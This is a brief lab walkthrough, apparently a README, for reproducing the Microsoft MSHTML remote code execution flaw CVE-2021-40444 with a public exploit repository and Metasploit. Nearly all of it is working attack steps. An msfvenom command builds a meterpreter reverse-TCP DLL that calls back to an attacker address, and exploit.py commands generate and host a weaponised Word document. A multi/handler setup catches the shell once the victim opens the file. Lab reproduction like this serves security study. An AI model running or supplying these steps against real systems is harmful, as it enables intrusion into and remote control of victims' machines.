An attempt to reproduce the Microsoft MSHTML Remote Code Execution (RCE) vulnerability (CVE-2021-40444) using the Metasploit Framework.

Note: works best if not run in FlareVM.

1. Clone the repository from https://github.com/lockedbyte/CVE-2021-40444.

2. Prepare the .dll template to be used later by the script, using msfvenom:

   msfvenom -p windows/meterpreter/reverse_tcp lhost=<SOURCE_IP> lport=<LISTENING_PORT> -f dll -o template.dll

3. Copy the newly produced template.dll into the folder test/ of the repository.

4. Give template.dll executable permission:

   chmod +x template.dll

5. Run the script so that template.dll is processed into the output document:

   python3 exploit.py generate ~/test/template.dll http://<SOURCE_IP>

6. The document is then exported into the folder out/, and we can start a listener on our HTTP port (default is 80):

   python3 exploit.py host 80

7. Run Metasploit and set up the handler (lport must match the <LISTENING_PORT> given to msfvenom; otherwise the handler listens on its default port 4444):

   msfconsole -q
   use multi/handler
   set payload windows/meterpreter/reverse_tcp
   set lhost <SOURCE_IP>
   set lport <LISTENING_PORT>
   run

8. Then we can send document.docx to our vulnerable machine and open the .docx there.

We will get a response in the exploit.py terminal, and the lab is successful if we are able to spawn a reverse TCP shell.